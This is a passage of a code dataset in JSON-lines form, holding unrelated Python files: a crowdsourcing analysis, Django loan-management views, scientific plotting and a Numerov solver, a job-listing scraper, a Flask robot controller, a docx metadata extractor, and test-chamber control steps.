UniqueWorker.shape[0]\n\nchoice_arr = ['optionA', 'optionB']\nchoices = ['Input.image_A_url', 'Input.image_B_url']\n \ncount = 1\nnumofworkerlessthan10 = 0\nfor element in UniqueWorker:\n info = ApprovedData[ApprovedData['WorkerId'] == element][['WorkTimeInSeconds','Input.image_A_url', 'Input.image_B_url', 'Answer.choice']]\n \n # if info.shape[0] < 5:\n # numofworkerlessthan10+=1\n # continue\n \n diff = 0\n l2 = 0\n print(\"{}th Worker {} complete {} tasks.\".format(count, element, info.shape[0]))\n count = count + 1\n # print(info)\n for index, rows in info.iterrows():\n \n a = rows['Answer.choice']\n idx = choice_arr.index(a)\n \n pic_name = info.loc[index,choices[idx]]\n if pic_name.startswith('KAQ'):\n continue\n \n # print(pic_name)\n pic_idx, res = pic_name.split('_')\n pic_idx = pic_idx.lstrip('R')\n res = res.rstrip('.png')\n df.loc[int(pic_idx), element] = res\n \n if res == 'l2':\n l2+=1\n if res == 'diff':\n diff+=1\n print('Choices: {} l2, {} diff'.format(l2, diff))\n # if count >=1:\n # break\n\n\n# df = df.drop(['max_occur_item','max_occur','total_occur'], axis=1) \n\nstatistic = np.zeros((50, 3))\nstatistic[:,0] = filelist\ncount = 0\nfor index, rows in df.iterrows():\n # max_occur_item = df.loc[index].value_counts().idxmax()\n # max_occur = df.loc[index].value_counts().max()\n # total_occur = sum(df.loc[index].value_counts())\n # df.loc[index, 'max_occur_item'] = max_occur_item\n # df.loc[index, 'max_occur'] = max_occur\n # df.loc[index, 'total_occur'] = total_occur\n tmp = df.loc[index].value_counts()\n \n for row in tmp.index:\n if row == 'l2':\n statistic[count, 1] = tmp['l2']\n if row == 'diff':\n statistic[count, 2] = tmp['diff'] \n count = count+1\n\n\nimport matplotlib.pyplot as plt\nind = np.arange(50)\nwidth = 0.5\np1 = plt.bar(ind, statistic[:,1], width)\np2 = plt.bar(ind, statistic[:,2], width, bottom=statistic[:,1])\nplt.legend((p1[0], p2[0]), ('L2-norm', 'Smooth'))\nplt.ylabel('Number of Times Selected')\nplt.xlabel('Index of Test Signals') \n\nl2_win = 0\nl2_largewin = 0\ndiff_win = 0\ndiff_largewin = 0\n\nfor i in range(50):\n if statistic[i,1] >= 4:\n l2_win += 1\n l2_largewin += 1\n else:\n if statistic[i,1] == 3:\n l2_win += 1\n \n if statistic[i,2] >= 4:\n diff_win += 1\n diff_largewin += 1\n else:\n if statistic[i,2] == 3:\n diff_win += 1 \nprint(l2_win, l2_largewin, diff_win, diff_largewin)\n\nwin_arr = np.zeros(3)\nfor i in range(50):\n tmp = statistic[i, 1:4]\n total = sum(tmp)\n max_val = np.max(tmp)\n max_idx = np.argmax(tmp)\n if max_idx == 0:\n print(i, statistic[i])\n if max_val > total*0.5:\n win_arr[max_idx] += 1 \n else:\n if len(np.argwhere(tmp==max_val)) == 1:\n win_arr[max_idx] += 1\n # else:\n # print(i, statistic[i])\n \nprint(win_arr)","sub_path":"AmtRes2col.py","file_name":"AmtRes2col.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"225535936","text":"import datetime\n\nfrom django.http import HttpResponse\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.models import User\n\nfrom rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom .models import ProfileData,LoanData,EmailData\nfrom .serializers import ProfileSerializer, UserSerializer, LoanSerializer, LoanClearSerializer\n\n\nclass UserRegister(APIView):\n serializer_class = UserSerializer\n\n def post(self, request, format=None):\n serializer = UserSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass CurrentUserView(APIView):\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n serializer = UserSerializer(request.user)\n return Response(serializer.data)\n\nclass LoanView(APIView):\n permission_classes = [IsAuthenticated]\n serializer_class = LoanSerializer\n def get(self,request):\n serializer = LoanSerializer(request.user)\n return Response(serializer.data)\n def post(self,request):\n data1 = ProfileData.objects.get(username=self.request.user)\n loan_stat = LoanData.objects.filter(username__username=data1).values('loan_status')\n det = len(loan_stat)\n if det != 0:\n det = det-1\n if loan_stat[det]['loan_status'] == True:\n return Response({'msg': \"Please first clear the taken loan before taking another loan\"})\n data = request.data\n serializer = LoanSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n alert_date=datetime.date.today()+datetime.timedelta(days=serializer.data['Loan_period']-1)\n Email= EmailData.objects.create(username=data1,alert_date=alert_date)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass LoanStatement(APIView):\n permission_classes = [IsAuthenticated]\n def get(self,request):\n data1=ProfileData.objects.get(username=self.request.user)\n data = LoanData.objects.filter(username__username=data1).values('loan_amount','Loan_period','loan_status','Date','STATUS')\n det = len(data)\n if det == 0:\n return Response({'Loan details': \"You haven't taken any loan\"})\n return Response(data)\n\nclass LoanStatus(APIView):\n permission_classes = [IsAuthenticated]\n serializer_class = LoanClearSerializer\n\n def get(self,request):\n data1 = ProfileData.objects.get(username=self.request.user)\n loan_stat = LoanData.objects.filter(username=data1)\n l = len(loan_stat)\n loan_stat=loan_stat[l-1]\n if l !=0:\n if loan_stat.loan_status == True:\n total_days = datetime.date.today()-loan_stat.Date\n Actualdue_date= loan_stat.Date+datetime.timedelta(days=loan_stat.Loan_period)\n if total_days.days <= loan_stat.Loan_period:\n remaining_days = loan_stat.Loan_period - total_days.days\n else:\n remaining_days = total_days.days - loan_stat.Loan_period\n amount=loan_stat.loan_amount\n r=0.6\n t=(1/365)\n sinterest_day= (amount*r*t)/100\n tinteresr_day=sinterest_day*total_days.days\n principal_amount = amount+tinteresr_day\n if total_days.days < loan_stat.Loan_period:\n return Response({'Total amount to be paid till date': principal_amount,\n 'Total Number of days remaining to pay loan': str(remaining_days) + ' days',\n 'Actual due date': Actualdue_date,\n 'Instruction': 'Check the below checkbox for closing the loan'})\n elif total_days.days == loan_stat.Loan_period:\n return Response({'Total amount to be paid till date': principal_amount,\n 'Total Number of days remaining to pay loan': str(remaining_days) + ' days',\n 'Loan status': 'Last day to pay loan',\n 'Actual due date': str(Actualdue_date) + '(today)',\n 'Instruction': 'Check the below checkbox for closing the loan'})\n else:\n return Response({'Total amount to be paid till date': principal_amount,\n 'Total Number of days crossed after the due period': str(\n remaining_days) + ' days',\n 'Loan status': 'Your had crossed your loan period',\n 'Actual due date': Actualdue_date,\n 'Instruction': 'Check the below checkbox for closing the loan'})\n return Response({'Loan status': 'You do not have any active loan'})\n return Response({'Loan status': \"You haven't taken any loan\"})\n\n def post(self,request):\n data1 = ProfileData.objects.get(username=self.request.user)\n loan_stat = LoanData.objects.filter(username=data1).values('loan_amount','Loan_period','loan_status','Date','STATUS')\n data = request.data\n serializer = LoanClearSerializer(data=data)\n serializer.is_valid()\n dat=serializer.data['loan_status']\n det = len(loan_stat)\n if dat==True and loan_stat[det-1]['loan_status']==True:\n if det !=0:\n loan_stats = LoanData.objects.filter(username=data1)[det-1]\n total_days = datetime.date.today()-loan_stats.Date\n if total_days.days < loan_stats.Loan_period:\n loan_stats.STATUS='Foreclosed'\n loan_stats.loan_status=False\n loan_stats.save()\n return Response({'Loan Status': loan_stats.STATUS})\n elif total_days.days == loan_stats.Loan_period:\n loan_stats.STATUS = 'Disbursed'\n loan_stats.loan_status = False\n loan_stats.save()\n return Response({'Loan Status':loan_stats.STATUS})\n else:\n loan_stats.STATUS = 'Defaulter'\n loan_stats.loan_status = False\n loan_stats.save()\n return Response({'Loan Status': loan_stats.STATUS})\n if loan_stat[det-1]['loan_status']==True:\n return Response({\"Loan status\": \"Check the checkbox to clear loan \"})\n return Response({\"Loan status\":\"You don't have any active loan\"})\n\n\ndef email(request):\n Email = EmailData.objects.filter(alert_date=datetime.date.today())\n recipient_list = []\n for e in Email:\n Udata = User.objects.filter(username=e.username)\n Pdata = ProfileData.objects.filter(username=Udata[0])\n Ldata = LoanData.objects.filter(username=Pdata[0])\n l=len(Ldata)\n if Ldata[l-1].loan_status==True:\n recipient_list.append(Udata[0].email)\n\n Subject = \"Alert!! \"\n Message = \"Tommorow is the last date to pay your loan amount,please pay it on or before due data.IGNORE if already paid\"\n email_from = settings.EMAIL_HOST_USER\n s=send_mail( Subject, Message, email_from, recipient_list )\n Emails = EmailData.objects.filter(alert_date=datetime.date.today())\n Emails.delete()\n return HttpResponse({\"message send sucessfully\"})\n","sub_path":"Bankloan/Accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"546005352","text":"from __future__ import division\nimport numpy as np\nimport pandas as pd\nimport itertools\nfrom pylab import *\nfrom itertools import cycle\nrcParams.update({'figure.autolayout': True})\n\ndata_dir = '../Experimental_Data/IWGBNG/'\nfds_dir = '../FDS_Output_Files/'\nplot_dir = '../Figures/'\n\ny_data = [0.2,0.4,0.6,0.8,1.0,1.2]\ny_fds = [0.2,0.4,0.6,0.8,1.0,1.2]\n\ntest_name = 'IWGB_NG_HF_Center_Avg'\nfds_name = 'hfwallcl_avg'\ndistance = ['_0D','_0p5D','_1D','_2D']\n\nfor i in range(len(distance)):\n\tdata = pd.read_csv(data_dir+test_name+'.csv', header=0)\n\tfds = pd.read_csv(fds_dir+fds_name+distance[i]+'.csv', header=0)\n\n\tdata_slice = np.squeeze(np.asarray(data.iloc[[i],1:]))\n\tfds_slice_05 = np.squeeze(np.asarray(fds.iloc[[0],1:]))\n\tfds_slice_10 = np.squeeze(np.asarray(fds.iloc[[1],1:]))\n\n\tfig = figure()\n\terrorbar(data_slice,y_data,xerr=0.15*data_slice,linestyle='None',marker='o',ms=8,color='k',label='Experiment')\n\tplot(fds_slice_05,y_fds,'k',label = 'FDS 05')\n\tplot(fds_slice_10,y_fds,'r',label = 'FDS 10')\n\tax1 = gca()\n\txlabel('Heat Flux (kW/m$^{2}$)', fontsize=20)\n\tylabel('Distance above Burner (m)', fontsize=20)\n\txticks(fontsize=16)\n\tyticks(fontsize=16)\n\tgrid(True)\n\tax = gca()\n\taxis([0, 60, 0, 1.4])\n\tlegend(numpoints=1,loc='upper right',fontsize=16 )\n\tsavefig(plot_dir + test_name + distance[i] + '_RI.pdf',format='pdf')\n\tclose()\n\n","sub_path":"Projects/Madrzykowski_Thesis/Plot_Scripts/vert_center_hf_ri.py","file_name":"vert_center_hf_ri.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"310138485","text":"import numpy as np\nimport random\nfrom math import exp, sqrt\nfrom random import randint\nimport matplotlib\nmatplotlib.use('WebAgg')\n\nimport matplotlib.pyplot as plt\n\n# helper functions, maybe not pass c as param\ndef V(c, x):\n if x >= 0 and x <= 1:\n return c*(x*x-x)\n return 0.\n\ndef kn(x, E, c, m=1., h=1.):\n return 2.*m*sqrt((E-V(c, x)/h**2))\n\ndef step(h, xC, xf, xff, E, c, psif, psiff):\n\n return 1/(1 + h*h*kn(xC, E, c)/12) * (\\\n 2*(1 - 5*h*h*kn(xf, E, c)/12) * psif -\\\n (1 + h*h*kn(xff, E, c)/12) * psiff)\n\n\ndef proc(c=1000):\n N = int(1e4)\n x_n = np.linspace(0, 1, N+1)\n k = 4328\n\n Vrand = x_n[k]\n\n h = 1./(N+1)\n\n psi_n = np.zeros(shape=[N+1,]) \n psi_n[0] = exp(-h * sqrt(2*Vrand)) \n psi_n[1] = 1.\n\n psi_n[N] = exp(-h * sqrt(2*Vrand))\n psi_n[N-1] = 1.\n\n for i in range(2, k):\n psi_n[i] = step(h, x_n[i], x_n[i-1], x_n[i-2], Vrand, c, psi_n[i-1],\n psi_n[i-2]) \n\n for i in range(N-2, k, -1):\n psi_n[i] = step(h, x_n[i], x_n[i+1], x_n[i+2], Vrand, c, psi_n[i+1],\n psi_n[i+2]) \n return x_n, psi_n\n\ndef solve():\n \"\"\"\n psi_l'(b)/psi_l(b) = psi_r'(b)/psi_r(b)\n => not necessary for this exercise\n \"\"\"\n return\n\ndef main():\n nodes = []\n for c in range(1,1001):\n x, p = proc(c)\n nodes.append(1-np.count_nonzero(p))\n plt.plot(range(1,1001), nodes)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ex1/numerov.py","file_name":"numerov.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"493652700","text":"import numpy as np\r\n\r\nurl = 'https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data'\r\niris = np.genfromtxt(url, delimiter=',', dtype='object')\r\n\r\n\r\ndef z1():\r\n print(np.unique(iris[..., 4]))\r\n\r\n\r\ndef z2():\r\n out = [0, 0, 0]\r\n data = iris.astype('str')\r\n types = np.unique(data[..., 4]).astype('str')\r\n for x in range(len(types)):\r\n for y in data:\r\n if y[4] == types[x]:\r\n out[x] += 1\r\n print(out)\r\n\r\n\r\ndef z3():\r\n print(iris[..., 0].astype('float').min())\r\n print(iris[..., 1].astype('float').min())\r\n print(iris[..., 2].astype('float').min())\r\n print(iris[..., 3].astype('float').min())\r\n\r\n\r\ndef z4():\r\n f = iris[..., :4].astype('float')\r\n s = iris[..., 4].astype('str')\r\n\r\n\r\ndef z5():\r\n f = iris[..., :4].astype('float')\r\n s = iris[..., 4].astype('str')\r\n types = np.array(['Iris-setosa', 'Iris-versicolor', 'Iris-virginica']).astype('str')\r\n for x in range(len(s)):\r\n if s[x] == types[0]:\r\n s[x] = 0\r\n if s[x] == types[1]:\r\n s[x] = 1\r\n if s[x] == types[2]:\r\n s[x] = 2\r\n s = s.astype('float').reshape(150, 1)\r\n result = np.concatenate((f, s), axis=1)\r\n print(result)\r\n","sub_path":"rozgrzewka/np_5.py","file_name":"np_5.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"591242017","text":"from datetime import datetime\nfrom urllib.parse import urlencode\nfrom multiprocessing import Pool\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\nimport csv\nfrom itertools import product\n\nTOTAL_PAGE_NUMBER = 5 # PAGE_NUMBER: total number of pages,可进行修改\n\nKEYWORDS = ['大数据', 'python', 'java工程师', '数据分析','人工智能'] # 需爬取的关键字可以自己添加或修改\n\n# 爬取主要城市的记录\nADDRESS = ['全国', '北京', '上海', '广州', '深圳',\n '天津', '武汉', '西安', '成都', '大连',\n '长春', '沈阳', '南京', '济南', '青岛',\n '杭州', '苏州', '无锡', '宁波', '重庆',\n '郑州', '长沙', '福州', '厦门', '哈尔滨',\n '石家庄', '合肥', '惠州', '太原', '昆明',\n '烟台', '佛山', '南昌', '贵阳', '南宁']\n\n\ndef download(url):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'}\n\n response = requests.get(url, headers=headers)\n\n # print(response.status_code)\n\n return response.text\n\n\ndef get_content(html):\n date = datetime.now().date()\n date = datetime.strftime(date, \"%Y-%m-%d\")\n soup = BeautifulSoup(html, 'lxml')\n body = soup.body\n data_main = body.find('div', {'class': 'newlist_list_content'})\n if data_main:\n tables = data_main.find_all('table')\n for i, table_info in enumerate(tables):\n if i == 0:\n continue\n tds = table_info.find('tr').find_all('td')\n zwmc = tds[0].find('a').get_text() # 职位名称\n zw_link = tds[0].find('a').get('href') # 职位链接\n fkl = tds[1].find('span').get_text() # 反馈率\n gsmc = tds[2].find('a').get_text() # 公司名称\n zwyx = tds[3].get_text() # 职位月薪\n gzdd = tds[4].get_text() # 工作地点\n gbsj = tds[5].find('span').get_text() # 发布日期\n tr_brief = table_info.find('tr', {'class': ' newlist_tr_detail'})\n # brief = tr_brief.find('li', {'class': 'newlist_deatil_last'}).get_text()\n yield {\n # 'tds':tds,\n 'zwmc': zwmc,\n 'zw_link': zw_link,\n 'fkl': fkl,\n 'gsmc': gsmc,\n 'zwyx': zwyx,\n 'gzdd': gzdd,\n 'gbsj': gbsj,\n # 'brief':brief,\n 'save_date': date\n }\n\n\ndef save_tocsv(data, file_name):\n with open(file_name, 'a', encoding=\"gbk\", errors='ignore', newline='') as f:\n header = ['zwmc', 'zw_link', 'fkl', 'gsmc', 'zwyx', 'gzdd', 'gbsj', 'save_date']\n f_csv = csv.DictWriter(f, fieldnames=header)\n f_csv.writerows(data)\n\ndef main(args):\n basic_url = 'http://sou.zhaopin.com/jobs/searchresult.ashx?'\n for keyword in KEYWORDS:\n paras = {'jl': args[0],\n 'kw': keyword,\n 'p': args[1] # 第X页\n }\n url = basic_url + urlencode(paras)\n html = download(url)\n if html:\n data = get_content(html)\n # for item in data:\n # print(\"item是 %s\" % type(item))\n save_tocsv(data, 'zhilian.csv')\n\n\nif __name__ == '__main__':\n start = time.time()\n number_list = list(range(TOTAL_PAGE_NUMBER))\n args = product(ADDRESS, number_list)\n pool = Pool()\n pool.map(main, args)\n end = time.time()\n print('Finished, task runs %s seconds.' % (end - start))\n","sub_path":"Forbes/ZhiLianSpider.py","file_name":"ZhiLianSpider.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"56154827","text":"from flask import Flask, render_template, redirect, url_for, request\nimport pprint\nimport json\nfrom roboutil import Robo, Motor\n\napp = Flask(__name__)\nrobo = Robo(Motor(16, 18, 35), Motor(38, 40, 37))\n\n@app.route('/')\ndef index():\n\treturn render_template('index.html')\n\n@app.route('/command', methods=['POST'])\ndef processCommand():\n\tprint(\"processing post ----------------\")\n\n\tdata = request.data\n\t# decoded data: password=default&email=test%40example.com\n\tif not data:\n\t\tdata = request.form\n\n\tcommand = str(data['command'])\n\tprint (\"command is - \" + command)\n\trobo.process(command)\n\n\treturn 'ok'\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')","sub_path":"remote.py","file_name":"remote.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"159019239","text":"import os\nfrom datetime import datetime\nfrom typing import Optional\n\nimport docx\nfrom docx.opc.exceptions import PackageNotFoundError\n\nfrom dedoc.data_structures.document_content import DocumentContent\nfrom dedoc.data_structures.document_metadata import DocumentMetadata\nfrom dedoc.data_structures.parsed_document import ParsedDocument\nfrom dedoc.metadata_extractor.concreat_metadata_extractors.base_metadata_extractor import BaseMetadataExtractor\n\n\nclass DocxMetadataExtractor(BaseMetadataExtractor):\n\n def __init__(self) -> None:\n super().__init__()\n\n def can_extract(self,\n doc: Optional[DocumentContent],\n directory: str,\n filename: str,\n converted_filename: str,\n original_filename: str,\n parameters: dict = None) -> bool:\n return converted_filename.endswith(\"docx\")\n\n def add_metadata(self,\n doc: Optional[DocumentContent],\n directory: str,\n filename: str,\n converted_filename: str,\n original_filename: str,\n parameters: dict = None) -> ParsedDocument:\n if parameters is None:\n parameters = {}\n file_path = os.path.join(directory, converted_filename)\n\n meta_info = self._get_base_meta_information(directory, filename, original_filename, parameters)\n metadata = DocumentMetadata(\n file_name=meta_info[\"file_name\"],\n file_type=meta_info[\"file_type\"],\n size=meta_info[\"size\"],\n access_time=meta_info[\"access_time\"],\n created_time=meta_info[\"created_time\"],\n modified_time=meta_info[\"modified_time\"],\n other_fields=self._get_docx_fields(file_path)\n )\n parsed_document = ParsedDocument(metadata=metadata, content=doc)\n return parsed_document\n\n def __convert_date(self, date: Optional[datetime]):\n if date is not None:\n return int(date.timestamp())\n return None\n\n def _get_docx_fields(self, file_path: str) -> dict:\n assert os.path.isfile(file_path)\n try:\n doc = docx.Document(file_path)\n properties = doc.core_properties\n parameters = {\n \"document_subject\": properties.subject,\n \"keywords\": properties.keywords,\n \"category\": properties.category,\n \"comments\": properties.comments,\n \"author\": properties.author,\n \"last_modified_by\": properties.last_modified_by,\n \"created_date\": self.__convert_date(properties.created),\n \"modified_date\": self.__convert_date(properties.modified),\n \"last_printed_date\": self.__convert_date(properties.last_printed),\n }\n return parameters\n except PackageNotFoundError:\n return {\"broken_docx\": True}\n","sub_path":"dedoc/metadata_extractor/concreat_metadata_extractors/docx_metadata_extractor.py","file_name":"docx_metadata_extractor.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"152567058","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPhoneApp\n\"\"\"\nfrom datetime import datetime\n\nimport tkinter as tk\n\nfrom .BaseClass import BaseClass\n\n\nclass PhoneApp(BaseClass):\n TIMEOUT = 30\n\n def __init__(self, db, canvas, width, height):\n super().__init__(db, canvas, width, height, self.TIMEOUT)\n\n self.time_font = tk.font.Font(family='Helvetica', size=28, weight='bold')\n self.number_font = tk.font.Font(family='Helvetica', size=28, weight='normal', slant='italic')\n self.date_font = tk.font.Font(family='Helvetica', size=18, weight='normal')\n\n self.summary = None\n self.btn_seen = None\n self.items = []\n\n self.phone = None\n\n self.reset_time = None\n\n def on_init(self):\n self.exit_button(0, 0, 100, 40)\n\n self.summary = self.text_button(100, 0, self.WIN_WIDTH-200, 90, \"...\")\n self.summary.set_font(self.TITLE_FONT)\n\n w = 600\n h = 80\n x = (self.WIN_WIDTH - w) / 2\n y = self.WIN_HEIGHT - h\n self.btn_seen = self.text_button(x, y, w, h, \"Gesehen\")\n self.btn_seen.set_font(self.BIG_BUTTON_FONT)\n\n def on_reset(self, custom_data):\n self.phone = custom_data[\"phone\"]\n\n # delete old entries\n for item in self.items:\n self.canvas.delete(item)\n self.items = []\n\n calls = self.phone.get_new()\n\n color = \"green\"\n x = 200\n y = 150\n\n today = datetime.now().strftime('%d.%m.%Y')\n self.reset_time = None\n displayed = 0\n\n for item in calls: # reversed(calls):\n if self.reset_time is None or item[\"time\"] > self.reset_time:\n self.reset_time = item[\"time\"]\n\n details = item[\"name\"]\n if details == \"\":\n details = item[\"number\"]\n\n txt = self.canvas.create_text(x, y, text=\"%s\" % item[\"time_str\"],\n anchor=tk.W, fill=color,\n font=self.time_font)\n self.items.append(txt)\n\n txt = self.canvas.create_text(x + 130, y, text=\"%s\" % details,\n anchor=tk.W, fill=\"#00ccff\",\n font=self.number_font)\n self.items.append(txt)\n\n if item[\"date_str\"] != today:\n txt = self.canvas.create_text(x - 10, y,\n text=\"%s\" % item[\"date_str\"],\n anchor=tk.E, fill=color,\n font=self.date_font)\n self.items.append(txt)\n\n displayed += 1\n y += 50\n if y > self.WIN_HEIGHT - 100:\n break\n\n if displayed < len(calls):\n self.summary.set_text(\"Neue Anrufe: {}/{}\".format(displayed, len(calls)))\n self.btn_seen.set_text(\"Gesehen / Nächste Seite\")\n else:\n self.summary.set_text(\"Neue Anrufe: {}\".format(len(calls)))\n self.btn_seen.set_text(\"Gesehen / Schließen\")\n\n def on_click(self, event):\n super().on_click(event)\n\n if self.btn_seen.hit(event.x, event.y):\n if self.reset_time is not None:\n self.phone.reset(self.reset_time)\n\n if len(self.phone.get_new()) != 0:\n self.reset_timeout()\n self.on_reset({\"phone\": self.phone})\n return\n\n self.close()\n\n# self.close()\n","sub_path":"User/rpi.py/src/apps/PhoneApp.py","file_name":"PhoneApp.py","file_ext":"py","file_size_in_byte":3493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"485766702","text":"\"\"\" Environmental Stress Screen (ESS) Chamber Steps\n========================================================================================================================\n\nUse these steps for both PRE-SEQ and SEQ when operating a 2C/4C Chamber that uses the standard Cisco Library\nfor the Chamber driver.\nThese step functions were modeled after the 2C Template.\n\nAdditional features include:\n 1. Default profiles for Commercial, Industrial, and QuickSimulation\n 2. Product specific profiles can be used also (defined in the product definition)\n\n\n========================================================================================================================\n\"\"\"\n\n# Python\n# ------\nimport logging\nimport collections\nimport re\n\n# Apollo\n# ------\nimport apollo.libs.lib as aplib\nfrom apollo.libs import locking\nfrom apollo.engine import apexceptions\n\n# Cisco Lib\n# ---------\nfrom apollo.scripts.cisco.libs.chamber.chamber_interface import HOT, COLD, AMBIENT, DRY, ChamberInterface\n\n# BU Lib\n# ------\nimport apollo.scripts.entsw.libs.utils.common_utils as common_utils\n\n\n__title__ = \"EntSw ESS Chamber Steps\"\n__version__ = '2.0.0'\n__author__ = 'bborel'\n\n# Chamber globals\n# ---------------\nlast_action = None\nchamber_handler = None\nMONITOR_IN_TEST = True # NOTE: True if want to monitor temperature during test\nCHAMBER_SYNC_GROUP = 'ChamberSync1' # NOTE: Default if the group name is not defined in the x_config.py\nALLOWED_CORNERS = [HOT, COLD, AMBIENT, DRY]\nDEFAULT_MAX_CHAMBER_SLOTS = 16\n\nlog = logging.getLogger(__name__)\nChamberProfileDesc = collections.namedtuple('ChamberProfileDesc', 'temperature rate margin duration max_humidity')\n\nDEFAULT_PROFILES = {\n 'commercial': [\n ('COLD', {'ramp': ChamberProfileDesc(0, 3, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 3, 5, 0),\n 'test': ChamberProfileDesc(None, None, 3, None, 0)}),\n ('HOT', {'ramp': ChamberProfileDesc(50, 3, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 3, 5, 0),\n 'test': ChamberProfileDesc(None, None, 3, None, 0)}),\n ('AMBIENT', {'ramp': ChamberProfileDesc(28, 3, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 3, 1, 0),\n 'test': ChamberProfileDesc(None, None, 3, None, 0)}),\n ('DRY', {'ramp': ChamberProfileDesc(25, 3, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 3, 1, 0),\n 'test': ChamberProfileDesc(None, None, 3, None, 0)})],\n 'commercial_yinhe': [\n ('COLD', {'ramp': ChamberProfileDesc(0, 1.5, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 5, 0),\n 'test': ChamberProfileDesc(None, None, 3, None, 0)}),\n ('HOT', {'ramp': ChamberProfileDesc(50, 1.5, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 5, 0),\n 'test': ChamberProfileDesc(None, None, 3, None, 0)}),\n ('AMBIENT', {'ramp': ChamberProfileDesc(28, 1.5, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 1, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)}),\n ('DRY', {'ramp': ChamberProfileDesc(25, 1.5, 0, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 1, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)})],\n 'industrial': [\n ('COLD', {'ramp': ChamberProfileDesc(-30, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)}),\n ('HOT', {'ramp': ChamberProfileDesc(60, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)}),\n ('AMBIENT', {'ramp': ChamberProfileDesc(25, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)}),\n ('DRY', {'ramp': ChamberProfileDesc(35, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)})],\n 'quicksim': [\n ('COLD', {'ramp': ChamberProfileDesc(22, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)}),\n ('HOT', {'ramp': ChamberProfileDesc(28, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)}),\n ('AMBIENT', {'ramp': ChamberProfileDesc(25, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)}),\n ('DRY', {'ramp': ChamberProfileDesc(26, 3, 2, None, 0),\n 'soak': ChamberProfileDesc(None, None, 2, 0, 0),\n 'test': ChamberProfileDesc(None, None, 2, None, 0)})],\n}\n\n\n# ======================================================================================================================\n# STEPS\n# ======================================================================================================================\ndef step__chamber_init(first_init=True, fi_action='ask', profile_type=None, corners=None):\n \"\"\"\n Chamber initialize - create object and set temperature profile\n :param (bool) first_init: True if this is first initialization of the chamber.\n If this is done in PRE-SEQ, then it should be set to False in SEQ.\n :param (str) fi_action:\n :param (str) profile_type: Recognized profile types.\n :return:\n \"\"\"\n global chamber_handler\n\n log.debug(r\"//\" + \"-\" * 50)\n log.debug(\"STEP: Chamber Init.\")\n\n profile_table = {\n 'commercial': chamber_default_commercial_profile,\n 'commercial_yinhe': chamber_default_commercial_yinhe_profile,\n 'industrial': chamber_default_industrial_profile,\n 'productdef': chamber_product_profile,\n 'quicksim': chamber_quick_simulation_profile\n }\n if profile_type:\n profile_type = profile_type.lower()\n if profile_type not in profile_table.keys():\n log.error(\"Chamber profile type '{0}' not recognized.\".format(profile_type))\n raise apexceptions.ApolloException\n else:\n log.debug(\"Chamber profile will default to the profile in the product definition.\")\n profile_type = 'productdef'\n\n sync_group = get_chamber_sync_group()\n\n log.info(\"Chamber Profile Type = {0}\".format(profile_type))\n log.info(\"Chamber Profile Name = 